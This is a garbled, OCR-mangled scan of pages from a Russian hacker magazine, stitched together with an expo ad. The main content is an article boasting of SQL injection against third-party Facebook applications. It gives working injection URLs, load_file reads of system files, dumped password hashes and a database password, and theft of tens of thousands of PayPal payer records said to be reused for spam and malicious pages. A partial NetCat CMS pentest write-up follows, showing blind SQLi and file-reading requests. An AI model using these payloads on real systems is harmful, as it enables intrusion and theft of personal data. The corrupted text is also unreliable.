вания, что приводит к сохранению эскизов с примонтированных 
зашифрованных файловых систем и сменных носителей. 

Держи дамп эскиза, созданного для графического файла на примонти- 

► 040 




рованном контейнере ТгиеСгурЪ 

$ НАСН0ІР-МЕТА0АТА~/.ТНІІМВМАІІ_5/М0РМАІ_/ 

(Ш97АР0С637АС86075013Е721720С77С.РМѲ 

МЕТАйАТА: 

— Ітаде ѵѵісШЪ.: 12 8 ріхеіз 

— Ітаде ЬеідЫі: 122 ріхеіз 

— ВіВз/ріхеІ: 24 

— Ріхеі ВогтаВ : КСВ 

— Сотргеззіоп гаВе: 1 . бх 

— Сотргеззіоп: ЪеВІаВе 

— Ргосіисег: СШМЕ : : ТВгитЪпаіІРасВогу 

— СоттепВ: ТВгитЪ: : Ітаде : : ШісіВЪ.=77 9 

— СоттепВ: ТВгитЪ: : Ітаде : :НеідЪ.В=744 

— СоттепВ: ТВгитЪ: :ІШІ = Ві1е : ///тесІіа/ВгиесгурВІ/123 . зрд 

— СоттепВ: ТВгитЪ: :МТіте=1216153400 

— МІМЕ Вуре: ітаде /рпд 

— Епсііап: Від епсііап 

Дамп эскиза, созданного для графического файла на СО: 

$ ЪасВюіг-теВасіаСа ~/ . ВВгитЪпаі1з/погта1/В34с0ВВ3299е0а0 
Ъ87а4а9аЗа4с19 94ВВ . рпд 
МеВасІаВа : 

— Ітаде ѵѵісІВЪ.: 12 8 ріхеіз 

— Ітаде ЪеідЪВ.: 96 ріхеіз 

— ВіВз/ріхеІ: 24 

— Ріхеі ВогтаВ : КСВ 

— Сотргеззіоп гаВе: 1 . 5х 

— Сотргеззіоп: йеВІаВе 

— Ргосіисег: СШМЕ : : ТВгитЪпаіІРасВогу 

— СоттепВ : ТВгитЪ: : Ітаде : : ШісІЕЪ.=32 64 

— СоттепВ: ТВгитЪ: : Ітаде : : НеідііВ=244 8 

— СоттепВ: ТВгитЪ: :ІШІ = Ві1е: ///тесііа/ 
%В0%ВЕ%В0%ВА%Б1%82%2025%202006/Р1010043 . ЪРС 

— СоттепВ: ТВгитЪ: :МТіте=1161800029 

Дамп эскиза, созданного для графического файлатеперь можно на- 
глядно лицезреть на своем компьютере в подлинном виде, что говорито 
дефекте в хранении графических изображений на современных опера- 
ционных системах. 

Автором данной уязвимости в ПО для крипо-защиты является Максим 
Суханов ( ВиВС^іісІеВепсе. ги ) . Посылаем ему всяческие респекты и поже- 
лания :). ~ 1 ~ 
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Ш Крокус Экспо 

Международный выставочный центр 



Контактная информация; 

Тел: (495) 727-26-31 
Е-плаі!: тагіпак@сгоси5-оН г и 
ѴѴеЬ: ѵлѵѵѵ. [ипіпд-ехро. ш 



сагтизіс 



В программе: 

* Чемпионат Формула Дрифт в закрытом помещении. 

- Рекорд России по аэрографии; роспись полотна 
в режиме он-лайн 1 2-ю художниками: 

■ Мастер-классы звезд автоспорта; 

■ Встречи клубных команд; 

■ Творческие встречи со знаменитыми персонами Москвы - 
героями журнала «Тюнинг Автомобилей»; 

■ Игровая зона; компьютерные симуляторы с гонками; 

■ Фотогалерея уникальных работ с авточемпионатов. 



тюнинг 





взлом 



тасеЬоок.Я 






ВЗЛОМ крупнейшей социальной сети 



|Новы^шд^Позд^ашіения^^^ги ша^танского^дого 



огни. Казалось бы, что еще нужно для счастья? Несомненно, сокрушительный 



взлом — новогодний хек крупнейшего проекта. Я выбрал цель — басеЪоок.сот 



— крупнейшую в мире соцсеть. А вот осуществил ли я взлом этого ресурса 
под бой новогодних курантов, ты узнаешь, прочитав эту статью. 



стория РасеЬоок.сот берет свое начало в феврале 2004 
года, когда девятнадцатилетний студент Гарварда МаркЗа- 
керберг решил сделать онлайн -справочник студентов свое- 
го вуза с их фотографиями и данными в Сети. В большинстве 
колледжей и институтов такой справочник носит название «басе Ьоок». 
Поначалу пользоваться его творением могли только студенты Гарварда, 
а сайт располагался по адресу ТЬеИсеЬоок.сот . Сейчасже ГасеЬоок. 
сот доступен для всех и каждого. По официальной статистике, на июль 
2007 года ГасеЬоок был седьмым по посещаемости сайтом в США и са- 
мым популярным ресурсом для студентов — 34 миллиона зарегистриро- 
ванных пользователей по всему миру. Даже такие гиганты, как МісгозоЙ, 
охотно сотрудничают со стольогромной рекламной площадкой! В 
октябре 2007 года также стало известно, что МісгозоЙ приобретает 1 ,6% 
акций РасеЬоокза 240 миллионов долларов. После чего был заключен 
контракт, по которому софтверный гигант будет размещать свои рек- 
ламные баннеры на сайте до 201 1 года. Какие уязвимости нашли в этом 
адовом проекте русские хакеры —ты сейчасузнаешь! 

Н (НАРРѴ) ОРАВ, СНІСКЕЕр РІІРР06 — ВЫ МОИ ДРУЗЬЯ! 

В силу определенных причин мое внимание привлекдовольно шуточ- 
ный а ррІісаЬоп- проект ГІиШТіепсІз.сот . Узел использовался в качестве 
редиректа на развлекательное приложение «Пий» по следующей 
ссылке: аррзіасеЬоок.сот/йий/йгіепсІз зрІазЬ.рЬр . Как выяснилось, 
такой байды на ресурсе насчитывалось сотнями, ато итысячами. Все 



началось с простого — я решил найти друзей у этого чудовища. 

ЫЩр : //аррз . ГасеЬоок. сот/ТІиТТ/ТІиТТЪоок. 
рЪр?ісі=65462 657 0 

Подставив аномальный параметр «ісі= 1 111111111», я получил ответ 
от ресурса, который намекал на то, что он все-таки обратился к базе, но 
ничего дельного не нашел. Тогда было решено выполнить специальный 
запрос кбазе, попытавшись подобрать количество колонок: 

ТШкр : //аррз . ТасеЬоок. сош/ТІиТТ/агк . 

р1тр?іс1=65432 9372+апс1+1 = -1+ипіоп+зе1еск + 1 ,2,3/4, 5, 6, 7,8 
, 9, 0, 1,2, 3,4, 5, 6, 7,8,9 — 

Бинго! Можно действовать дальше: 

ТШкр : / /аррз . ТасеЬоок. сот/Т1иТТ/11и1ТЬоок.р]тр?і<і=65462 6 
570+апс1+1 = 2+ипіоп+Зе1есЩ+а11 + 1 , 2 , СОЫСАТ_М5 (СНАК (32,58, 
32 ) , изег ( ) , сЗакаЬазе ( ) , ѵегзіоп ( ) ) ,4,5,6 , пиіі ,8,9,10,11, 
12,13,14,15,16, сопсак (изег , %2 0 0x3 а , %2 Ораззтлгогсі) ,18,19 
, 2 0 , 21+РКОМ+шуздІ . изег+1ішік+1 , 1 (играемся со значением 
лимита ) 

А вот и заветные пользователи! 




► 042 



ХАКЕР 02 /1 22/ 09 





взлом 



Хэш рута! Ты испугаешься, когда узнаешь, какой парольтам использовали 



На лицо все из файла хостов, используемого для резолва в 



системе 



ТасеЬоок 





тииФіЯ2.Ій#,1.Ібе: 
ПиГГ2 і 5.067-кч 




гим і 




®РакІ№ 


ѵіг ЛЬ Ь*А ~ 


ІСМ-І5Й Т Р.жч- ГѴ 




г ._ л . *І. ьі г« 
кчвсц.ца | іи іи'; 
М.№кц 


•іі*і іі^іі>ііііі'ііДіі^і я і'ттагпі іпттгг чш Ті 


№ ниайф і 0\* *~**гі 
1 |И : ' 



Наглядный вывод/еіс/раззѵѵсі 



, 32 ) ,изег ( ) ,с1аТаЬазе ( ) , ѵегзіоп ( ) ) , 4 , 5 , 6 ,гш11 ,8,9,10,11 



,12 ,13 ,14, 15,16, 1оаЬ_Ті1е( 0x2 16574632 17 0687 02е69 6е69) , 



гооТ : *3 68С0802 1Е72 6 0А991А9Б8121В7В7 808С99ВВВ8А 
з1аѵе_изег : *38Е277В5СА4ЕАА7Е9А73Е8ЕЕ80813В7В5859Е407 
тші: *74А45В921А1А918В18АЕ9В137396Е5А67Е006262 
топіТог : *1840АЕ2С95804ЕС69321В1ЕЕЗЗААВЕА2 49817 034 
тааТкіТ : *9ЕА5157314А2СЕ7448А34ВА070В5В44Е977А1220 



18,19,20,21-- 

Чтение /еТс/ЪозТз (2Т6574632Т686Т737473 ) 

ЬТТр : //аррз . ТасеЬоок. сот/Т1иТТ/Т1иТТЬоок.рЬр?іс1=65462 
6570+апЬ+1=2+ипіоп+Зе1есТ+а11+1,2 ,С(ЖСАТ_М8 (СНАК (32 ,5 



(МааТкіТ: а ТооІкіТ оТ иТіІіТіез апЬ Тооіз Тог МуЗОБ) 

И —традиционные приемы, которые позволяют выведать, что там 
крутится: 

Чтение /еТс/раззѵгсІ (2Т6574632Т706173737764 ) 

ЬТТр : / /аррз . ТасеЬоок. сот/Т1иТТ/Т1иТТЬоок.рЬр?ісі=654 62 
657 0+апсі+1=2+ипіоп+Зе1есТ+а11+1 , 2 , ССЖСАТ_МЗ (СНАК (32,5 
8,32) ,изег ( ) , ЬаТаЬазе ( ) , ѵегзіоп ( ) ) , 4 , 5 , 6 , пиіі ,8,9,10, 
11,12,13,14,15,16, 1оас1_Ті1е ( 0x2 Т657 4632 Т7 06173737764) , 

18,19,20,21-- 



8,32) , изег ( ) , ЬаТаЬазе ( ) , ѵегзіоп () ) ,4, 5, 6, пиіі, 8, 9, 10, 
11,12 ,13 ,14, 15, 16, 1оасі_Ті1е (0x216574632 Т686Т737473) ,1 
8,19,20,21— 

Файл Ьозіз на разных системах имеет разное расположение, но отвечает 
за совершенно идентичные вещи. В нормальном виде он выглядел так: 

127.0.0.1 ІосаІТюзТ ІосаІЬозТ . Іосаісіотаіп 
192.168.1.167 14 0696-с1Ъ2 . ТІиТТТгіепсІз . сот 140696-ЬЬ2 
192.168.1.166 14 0695-сІЫ . ТІиТТТгіепсІз . сот 140695-ЬЫ 
192.168.1.165 140694-^еЬ2 . ТІиТТТгіепсІз . сот 140694-меЬ2 
192.168.1.164 14 0693-меЫ . ТІиТТТгіепсІз . сот 140693-тееМ 



Чтение /еТс/ЬТТрй/сопТ/ЬТТрй.сопТ (2Т6574632Т687474706 
42Т63бТбе662Т68747470642е63бТ6е66) 

ЬТТр : / /аррз . ТасеЬоок. сот/Т1иТТ/Т1иТТЬоок.рЬр?іс!=654 62 6 
570+апЬ+1=2+ипіоп+Зе1есТ+а11+1 ,2 ,СОБСАТ_ШЗ (СНАК (32 , 58 , 
32 ) ,изег ( ) , ЬаТаЬазе ( ) , ѵегзіоп ( ) ) , 4 , 5 , 6 , пиіі ,8,9,10,11, 
12,13, 14, 15,16, 1оаЬ_Ті1е( 0x2 Т6574632 Т6874747 0642 Т636Т6 
е662Т68747470642е636Т6е66) ,18,19,20,21 — 

Чтение /еТс/рЬр.іпі (2Т6574632Т7068702е696е69 ) 

ЬТТр : //аррз . ТасеЬоок. сот/ Т1иТТ/Т1иТТЬоок.рЬр?іс1=6 54 62 6 
57 0+апс1+1=2+ипіоп+8е1есТ + а11 + 1 , 2 , С(ЖСАТ_ШЗ (СНАК (32 , 58 



69.63.176.141 арі . ТасеЬоок . сот 
208.116.17.80 реапиТІаЬз . сот 

Сами мы, скорее всего, находились на 192.168.1 .168. 

Чтение /еТс/ту.спТ (2Т6574632Т6<і792е636е66) 

ЬТТр : //аррз . ТасеЬоок. сот/Т1иТТ/Т1иТТЬоок.рЬр?іс1=654626 
570+апЬ+1=2+ипіоп+8е1есТ+а11+1 ,2 , С(ЖСАТ_№3 ( СНАК ( 3 2 ,58 
, 32 ) ,изег ( ) , ЬаТаЬазе ( ) , ѵегзіоп ( ) ) , 4 , 5 , 6 , пиіі ,8,9,10,1 
1,12,13 ,14, 15,16, 1оасМ:і1е( 0x2 Т6574632 Т6Ь792е636е66) , 

18,19,20,21-- 
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> іггіо 

• Подбор коло- 
нок проще всего 
осуществлять 
автоматизировано. 
Конечно, самое 
простое — заюзать 
уже созданный софт 
(ты найдешь его на 
диске]. Ручками пе- 
ребрать такое было 
бы запарно, хоть и 
реально. 

• Раскрытие пути в 
описании ошибки 
базы целиком и 
полностью выда- 
вало тот факт, что 
создатели РасеЬоок 
применяют НиЬу 

оп Наііз в своих 
проектах: 

/Ьоте/гісіеЬесѣ./ 
гаі 1 з / соішпипі Су / 
риЬІіс/ ІасеЬоок/ 
зпоѵлгерогЬз/ 
герогС . рЪр . 




іже в названии баз частично проглядываются намеки РиЬу оп Наііз 






/Іутим с конвертом /еіс/раззѵѵб для подстановки в запрос к 
іазе 



іИГОВ 



іасеЬоок 



іасеЬоок 



4.1.22-аіагкічіМ 



■ “ 2і] 




Нека4есйпа1 








2РЮ74Ы2Р7Э6861Н6Р77 


Л 

_1І 


Сіе* | 




Л 


Л 




А50І / Оесіпоа! 








Ме/рак«с| 


Л 


НеиЗАЗСМ | 








|7 НекФес 1 








17 АЗОІ2НК 





3 


Л 





Отсюда узнаем о непростом устройстве репликации: 



• Все описанные 
подпроекты были 
найдены при помо- 
щи специальных 
сервисов. В статье 
«Разлом М5І\І» 
рассказывалось, 
как, используя 
мощи М5І\І/0оодІе, 
узнавать такую ин- 
формацию. А сейчас 
твой кругозор рас- 
ширит следующий 
сервис: зегѵегзпіІР 
с!е/сопІеп1.рЬр?бо= 
зиЬботаіпз . 
Вбиваешь ресурс — 
и мигом получаешь 
все поддомены! 



#ЗЕКѴЕК 2 13 ТНЕ МАЗТЕК ЕОК БВ1 АШ ЗЬАѴЕ ЕОК. 
БВІ 

1од-Ьіп=/ѵаг/1іЬ/тузд11одз/Ьіп-1од 
ЪіпІод-Ьо-ЬЪ^ІиІО 
ехріге-1одз-сіауз = 14 
зегѵег-ісі = 2 

#тазЬег-ЬозЬ=192 . 168 . 1 . 166 

#тазЬег-изег=з1аѵе_изег 

#тазЬег-раззѵ\гогс1=реаріе1212 

#тазЬег-соппесЬ-геЬгу=60 

гер1ісаСе-сіо-(іЬ=11и111 

#1од-з1аѵе-ирс1аЬез 
ехріге_1одз_с!ауз = 14 



Поначалу найденные уязвимости на приложениях 
РасеЬоок настойчиво манили на центральный проект. 
Наделе часть из них располагается на совершенно 
сторонних серверах. К примеру, аррз.басеЬоок.сот/ 
5поѵѵа^о/агеа.рЬр?агеаіс1 - 303021 + АЫР +1 = 2+ Ц№ 
ОЫ+АТ.Т.-І-ЯКТ.КСТ-І-ОЛ.2.3.4- оказывается «клоном» 
аШпІ5расе.сот/басеЬоок/5поѵѵа^о/агеа.рЬр?агеаісі = 30 

который к тому же с потрохами сдает информацию 
через общедоступный рЬріпіо по адресу СаШпізрасе. 

сот/басеЪооЮ . 



Несколько багов 
для размышления: 

Помимо перечисленных, на ресурсе существуют и 
другие уязвимости. Комментировать не буду — все 
додумаешь сам. 



1) Ьіір: //аррз . іасеЬоок . сош/зповдадо/агеа .рЬр?агеаісІ=3 О 
3 02 1+А]>ГО+1=2+ІМІ(Ж+ЗЕЬЕСТ+0 , ѵегзіоп () ,2,3,4-- 

БаіаЬазе: аіііпізрас_іЬ 
Изег; аіііпізрас_іЬ@1оса1Ьозі 
Ѵегзіоп: 5 . 0 . 67-соттипііу 



2 ) Ьіір : / /шт . сЬіпезегосІіасЬогозсоре . сот/ іасеЬоок/ 
іпйех1.рЬр?изег_іЦ=663991991%20АЖ)%2 01=2%2 0ШІОЫ%2 05Е 
ЬЕСТ%2 00 ,1,2, 3,4, 5, б, 7,8, СОЫСАТ_№3 (СНАЕ (32,58,32) ,изе 
г ( ) , баіаЬазе ( ) , ѵегзіоп ( ) ) , 10 , 11 ,12,13, 14--&2оЬіас=1 



> р1иску@1оса1Ьозі : іасеЬоок : 4.0.13-1од 

3 ) Ьіір : / /аррз . іасеЬоок . сот/пемазігоіоду /пеѵгазіго . 
рЬр?иій*1 387771663 +МГО+ 1=2 +ШІ(Ж+8Е1гЕСТ+ б і 1 ,2 , 3 , 4 , 5 , б 
,7,8,9, СОЖ1АТ_Ѵ/3 ( СНАЕ (32,58,32) ,изег() ,ЬаіаЬазе() ,ѵег 
зіоп() ) ,11,12,13,14,15,16,17,18,19,20,21-- 

4 ) Ьіір : / /аррз . іасеЬоок. сот/ г ісІегіесЬ/1осаііоп.рЬр?іс1= 
7449 +АЖ>+ 1=2 +ІМІСЖ+ ЗЕЛЕСТ+ 0 , СОЫСАТ_№5 ( СНАЕ (32,58,32) , 
изег ( ) , сЗаіаЬазе ( ) , ѵегзіоп ( ) ) ,2,3,4,5,6,7,8,9,10,11,12 
,13 ,14,15 ,16,17,18,19,2 0,21,22,23 — 
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Ломать голову, почему рЬріпЬО был доступен всем — вредно. Мы просто 
по 



поняли, что онтам был 



Вытягиваем все ручками изтаблицы раураИрп. Позже было решено 
автоматизировать процесс 



кіоп_зсЬета . со1итпз+1ітік+1 , 2 

Естественно, ваш покорный слуга не могобойти это дело. Для разведки 
пришлось прибегнуть к помощи известной тебе зрітар/зціпіща. 



Н КТО ТЫ, КРАСАВИЦА? Я - ЛЮДКА-НЕЗАБУДКА! 

Послеувиденного я испытал самый настоящий новогодний шок. Но вре- 
мя нетерпело. Пока админы ресурса пили шампанское за уход кризиса, 
я шел вперед. Сначала узнал базы: 

ЪЬкр: //аррз . касеЬоок. сот/к1икк/:і:1иккЬоок.рЬр?іЛ=654626 
570+апЛ+1=2+ипіоп+Зе1еск+а11+1 , 2 , 3 , 4 , 5 , 6 , пиіі ,8,9,10,1 

1.12.13.14.15.16, сопсак ( Охіе , Охіе , СОШТ ( * ) , Охіе , 0x2 0 ) , 
18,19,20 , 21+ЕКОМ+іпкогтакіоп_зсЬета . зсЬетака 

Цифра «3» означает, что на ресурсе присутствуюттри базы. Их имена 
узнаются следующим образом для Му50І_: 

ЗЕЬЕСТ зсЬета_пате ЕЕОМ іпкогтакіоп_зсЬета . зсЬетака 
(МуЗОЬ >= ѵ5 . 0) ; или так: 

ЗЕЬЕСТ Лізкіпск (ЛЬ) ЕЕОМ тузді . ЛЬ 

— либо автоматизировано, с помощью зцітар. На деле это оказались: 
тузці, ЬиЫ , ЛиЛ2. После долгого изучения каждой из них в базе ЬиЬ2 
была обнаружена таблица раураИрп с огромным количеством колонок: 

Ьккр : //аррз . касеЬоок. сот/к1икк/к1иккЬоок.рЬр?іЛ=65 
462 6570+апЛ+1=2+ипіоп+Зе1еск+а11+1 , 2 , 3 , 4 , 5 , 6 , пиіі , 

8.9.10.11.12.13.14.15.16, сопсак (каЫе_паше, каЫе_ 
зсЬеша , со1итп_паше , Охіе , 0x2 0) ,18,19,20, 21+ЕКОМ+іпкогта 



Ьккр: //аррз . касеЬоок.сот/кІикк/кІиккЬоок. 

рЬр?іЛ=65462 657 0+апЛ+1=2+ипіоп+Зе1еск+а11 + 1 , 2 , СО 

ЫСАТ_МЗ (СНАК. ( 32 , 58 , 32 ) ,изег() ,ЛакаЬазе() ,ѵегзіо 

п ( ) ) ,4, 5, 6, пиіі, 8, 9, 10, 11, 12, 13, 14, 15, 16, сопсак 

_ілгз ( 0x3 а , изег , кхп_і Л , ѵаі і Л_ірп , раушепк_зкакиз , шс_ 

дгозз , шс_кее , шс_сиггепсу , кіше , гесеірк_іЛ , рауег_ 

іЛ,рауег_ешаі1 , кігзк_паше , 1азк_паше , аЛЛгезз_ 

пате , аЛЛгезз_зкгеек , аЛЛгезз_сіку , аЛЛгезз_зкаке , 

аЛЛгезз_зір , аЛЛгезз_соипкгу , аЛЛгезз_соипкгу_ 

соЛе , гезіЛепсе_соипкгу , раутепк_Лаке , раутепк_ 

кее , раутепк_дгозз , диапкіку , раутепк_куре , рауег_зкакиз , кхп_ 

куре , сизкот, Лиріісаке) ,18,19, 2 0 , 21+ЕКОМ+к1икк2 . 

раура1_ірп+1ітік+0 , 1 

После этого несколько десятков тысяч пользователей, производящих пла- 
тежи, былиу меня в кармане. Даже такие именитые проекты имеютбреши! 

Н ЛИХА БЕДА НАЧАЛО 

Конечно, следить за безопасностьютакого огромного проекта нереально 
тяжело. По сути, хакеру удалось получить доступ к ряду сторонних проек- 
тов, и тем самым узнать немного о внутреннем устройстве и функционале 
РасеЬоок. Крометого, похищенные данные о людях, осуществляющих 
денежные переводы для прокачки внутри этой социальной сети, цели- 
ком и полностью пошли на таргет-спам с фейкованными страницами и 
вредоносными ресурсами.^с 



ХАКЕР 02 /1 22/ 09 



► 045 








взлом 



п 




Многие сайты, расположенные в интернете, базируются на СМ3. Часто это 
вполне оправдано. Не стал исключением и официальный сайт одной конторы, 
обратившейся ко мне по поводу тестирования на проникновение методом 
«черного ящика». Перейдем сразу к делу, мой друг, — сейчас я расскажу тебе 



про все тонкости проведенного аудита. 



оверхностный серфинг по сайту сразуже выявил админку, 
на которой в заголовке страницы красовалась надпись 
«Система управления сайтами ЫеіСаіЗ.О Ехіта». Рабо- 
тать на уровне «Ыаск-Ьох», конечно, креативно, но более 
продуктивно — иметь возможность искать баги в режиме «дгеу-Ьох» и 
«ѵѵбйе-Ьох». Поэтому, не мудрствуя лукаво, с сайта производителя была 
загружена Бето-версия этой движки. Гугление по баг-трекам результа- 
тов не принесло, а значит, предстояло расковырять СМ5 самостоятель- 
но. 

Я загрузил к себе на машину полный комплект дистрибутива и сумным 
видом проследовал все этапы а-ля «Ыехі». Браузер отобразил диалог 
установки нового сайта, — и через пару минутв моем распоряжении был 
полигон для тестирования. 

Н ПЕРВЫЙ РУБЕЖ ОБОРОНЫ 

Первая преграда состояла в том, что все файлы ЫеіСаІ: закоди- 
рованы с использованием 2епсІ. Но это защита от домохозяек. 
После того, как я достал из своего арсенала комплект «сіегепсі» 
(который можно легко найти на просторах Сети] и обработал им 
все файлы, моему взору предстали откровения СМ5 — его сорцы. 



Для облегчения работы стоило включить отладочный режим, а также 
отключить все ненужные излишества: тадіс_диоСез_дрс — это зло, 
отключаем его путем удаления соответствующих строк из .Ыюссезз, 
расположенного в корневой директории ѵѵеЬ-сервера. Магические 
кавычки также включены в конфигурационном файле /пеСсаС/ѵагз . 
іпс .рЪр, поэтому сбрасываем егозначениевнольив этом файле. Там 
же переопределяем переменную «$ЗНОѴ/_МУЗОЬ_ЕККОКЗ» в значение 
«Оп». Остался еще файл рЬр . іпі, в котором переопределяем значения 
«с!ізр1ау_еггогз» и «<Тізр1ау_зСагСир_еггогз» в значение «Оп», 
и заодно меняем «еггог_герогйпд» в «е_аьь & ~е_ыотісе». Переза- 
пускаем демон арасбе. Вроде бы все, однако существует возможность 
еще больше упростить поискошибок методом «серого ящика» — отобра- 
зить в браузере все запросы, поступающие к БД Му50І_. В нашем случае 
этого можно добиться путем вставки «есію " $диегу<Ъг>" ; » в файл 
зд1_тузд1 .рЪр , в функцию «диегу{ }». Тогда все запросы, посту- 
пающие к БД, будут отображаться в браузере. Отлично, можно перейти 
непосредственно кпоиску багов в ЫеіСаі! 

Пробежавшись по ссылкам тестового сайта и подставив одинарную ка- 
вычку в произвольный запрос, я вынудил ЫеЮаІ сдаться до начала боя. 
На запрос вида «/аЬоиС/ = 1 1 » браузер выплюнул заветную «Уои Ьаѵе 
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ап еггог іп уоиг ЗОЬ зупСах». Это была уязвимость 
типа «Слепое выполнение произвольных5С11_-запросов» 

(В Іі псі ЗОБ Іпіесііоп]. Техника эксплуатации подобныхуязви- 
мостей давно отработана и заключается втом, что на основе 
логического выражения нужно определить истинность 
какого-либозапроса, передаваемого в БД. Например, на 
запрос: 

«/аЬоиС/ = 1 ' /**/0К/**/Епд1ізШате= 1 ргоіііе 1 
/**/А№Ѵ**/1=1» ѵѵеб-сервер в данном случае ответит 
«НТТР 3 02 ЕоипсІ », и это будет означать ТЕЩ, а на запрос 
«/аЬоиС/ = 1 ' /**/0К/**/Епд1ізЪ.Ыате= 1 ргоіііе 1 
/ * * /ДЫБ/ * * / 1 = 2 » ѵѵеб-сервер ответит: «НТТР 404 ЫоС 
Роипсі», что будет означать ЕАЬЗЕ. Используя конструкции 
видаібО, азсіі ( ) , зиЬзСгіпд ( ( ЗЕЬЕСТ . . . ) ) или 
ыке, становится возможным получитьлюбую информацию 
в пространстве БД, к которой есть доступ в соответствии с 
АСІ_. Можно даже читать произвольные файлы, если у поль- 
зователя БД есть разрешение Рі1е_ргіѵ, а также заливать 
ѵѵеЬ-зЬеІА, если не экранируются кавычки. 

На этом, в общем-то, можно было и закончить поиск 
багов в исследуемой СМ3, эксплуатируя найденную 
уязвимость, если бы не одно «но». Магические кавычки 
(шадіс_диоСез_дрс) вдефолтовой конфигурации ІЧеЮаІ: 
включены — и поэтому нужен другой вектор проникновения. 
Побродив по тестовому сайту и убедившись в его видимом 
отсутствии (что было найдено, не удовлетворяло условиям 
поиска], я решил искать уязвимости посредством анализа 
исходных текстов приложения. 

Н АНАЛИЗ ИСХОДНОГО КОДА 

Для автоматизированного анализа исходного кода уже 
давно существует огромное число инструментов, позволяю- 
щихза короткое время выявить потенциальныеуязвимости 
путем разбора кода. Разделяютдва подхода канализу 
— динамический и статический. 

Большее распространение получили именно статисти- 
ческие анализаторы (благодаря простоте реализации]. 



Такой инструментарий можно найти под все распро- 
страненные языки программирования, в том числе под 
РНР (смотри, гаіз]. Такой анализ в ряде случаев выдает 
огромное число Іаізе розіБѵе либо вообще не находит 
ни одной уязвимости в коде, который может быть просто 
напичкан различными багами. В связи с этим подход ме- 
тодом статического анализа исходного кода применяется 
больше как вспомогательный при ручном анализе кода. 
Более эффективны динамические анализаторы. Таких 
продуктов не такуж и много в силу их сложности (одну и 
туже операцию можно выполнить бесконечным числом 
вариаций, поэтому такие анализаторы должны хорошо 
уметь парсить синтаксис языка]. А цена по причине ог- 
раниченного круга потребителей достаточно высока. Как 
следствие, в Сети подобные инструменты просто так не 
валяются. Стоит отметить, что и динамические анали- 
заторы кода могут не заметить логическую уязвимость, 
присутствующую в приложении. Например, уязвимости 
типа «Предсказуемое значение идентификатора сессии» 
(СгесІепБаІ/Зеззіоп Ргебісбоп] или «Небезопасное 
восстановление паролей» (ѴѴеак РаззѵѵогсІ Ресоѵегу 
ѴаІібаБоп] будут пропущены. 

За неимением инструментов динамического анализа 
исходных текстов приходится пользоваться статическими 
анализаторами. Для этих целей необязательно исполь- 
зовать чужую разработку, сойдет и дгер/едгер. Используя 
могучий язык регулярных выражений, можно найти ряд 
уязвимостей разного уровня критичности по сигнатурно- 
му принципу. Конечно, придется на время включить мозг, 
но, в целом, способ приемлем для простого ресерчинга. 
Например, конструкция «дгер -К -і "1іеас1ег[ ( ] " * | 
дгер -і ЬосаСіоп | дгер " \$ "» покажет потенциаль- 
ные уязвимости «Расщепление НТТР-запроса», которые 
могут существовать при передаче необработанных дан- 
ных функции Ьеасіег ( ) . Использование этой уязвимости 
пригодится в проведении фишинг-атак и различных атак 
на браузер пользователя. 




На дискеты найдешь 
рос-коддля эксплу- 
атации уязвимости 
ЫіпсІ 50Б ІщесБоп 
с использованием 
ЬепсЬшагк (] иссле- 
дуемой движки. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознакомле- 
ния! Ни автор, 
ни редакция за твои 
действия ответствен- 
ности не несут! 
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• Используя могучий 
язык регулярных 
выражений, можно 
найти рядуязвимос- 
тей разного уровня 
критичности по сиг- 
натурному принципу. 

• Изучение отде- 
льных модулей СМ5 
путем обращения 

к ним напрямую, 
при включенном 
гедІ5Іег_дІоЬаІ5, 
порой позволяет 
переопределить ка- 
кие-либо внутренние 
переменные и, как 
следствие, обратить- 
ся кразличным функ- 
циям типа іореп ( ) , 
іпсіисіе ( ) , еіс. 
без фильтрации 
передаваемых в них 
аргументов. 
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Ссылки: 

• ѵѵѵѵѵѵ.оѵѵазр.огд 

• (огит.апбсЬаС 
гиАЬгеаб35207.Ы:т[ 
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и е Ь с аі /те з з аде - рЬр 
8Ые_а<*т1п=1'* >; 
пеісаЪ/пеБзаде.рНр 
[іп=1 ,р >; 



ЬеайеіЧ "Хосаііоп- |Р . $доВаскЬіпк. 
ЬеасІеіЧ "Хосаііоп: ".ЗдоВаскЬіпк. "Ып 
ЬеасІеіЧ *1осаііоп! м . $доБаскІЛпк. ,, &іпзЫе_а<іпа 



пе1саі/гшгіи1ез/аи1:Ь/іп<іех_рЬр: кеаіеіЧ "Хосаііоп :” И $**е<1ігесі >; 

пеісаі/тосІи1ез/аиіЬ/іп<іех .рЬр : ЬеайеіЧ "Ьосаі іоп : ''.^геіігесЬ >; 

леісаі/посІиІез/Ьаппеі'/іпйех.рЬр: кеайеіЧ "Хосаііоп: **.$1іпк >; 

пеісаі/тогіиІез/Ыод/'ІЧіпсііоп. іпс .рЬр: кеаіеіЧ "Хосаііоп: * р .$ш*1 >; 

пеѣсаЪ/поі1и1ез/1іпктападех > /х к е<ііі'осі.р]ір:кза<іег > С , Ъоса^іоп: ,, н $иг1 ); 
п еСсаС/пофдІез/пеЕзЬор/розЕ *рЬр; Ьеа<31еі % < "Ьоса^іоп: И .$і*е(Ііі*есілі*1 >; 



гГессас/по Ли Іе 5 /п е с 5 Ію р/зе сир - рЬр - : ѢёайеіЧ ''ЬосасіогГТ Тпессаі/адіі , рЬр? іп з і 

(Іе_аі1тіп =1 &с а Іо дие = * ' . $ с аЪ а Іо дие - ,р &зиЬ={$зІіор_зиЫіи із іоп_Ш&сс={$8})орлвИіпд 

«-СсХ 1 ' >; 

л еЬса^/гедиіге/е 464 . рЬр : ЬеайегС 'Хосайісш- ,, -$і*е<іігесІ:Ло_иг1 >; 

пе іс аі/ге іге / 1 ІЬ/НТТ Р/С1 іе . рЬр : $1оса€іоп - $к*еаиез€->де1;і'езропзе 

кеайегС 'Хоса^хоп* 1 > ; 

пе Іс а^/ге ди іге/з _е 404 . іпс . рЬр : НеаіегС 'Хосаііоп: ,р -$і ч ези1^_иг1 >; 

ЧмМмв^нкйи^ 



Выявлениеуязвимостей НТТР ВезрогшеБрШіпд 



Набор сигнатур (" = 1 \ " \ . \$_" , " = \ " \ . /<?= ( 
іззеС ( \$_" ит.д.) позволяетлегко искать уязвимости типа 
«Межсайтовое выполнение сценариев». Ищутся и более 
интересные баги, например, такие как«Чтение произволь- 
ных файлов». 

Ручная проверка подтверждает присугствиеуязвимостей 
в ряде случаев. Так, сформировав запрос вида «/пеСсаС/ 
тойиІез/пеСзЬор/розС . р!ір?зузСет= . 

. . / .1іСассезз%00», можно получить содержи мое файла 
.Ыассезз, расположенного в корневой директории ѵѵеб-серве- 
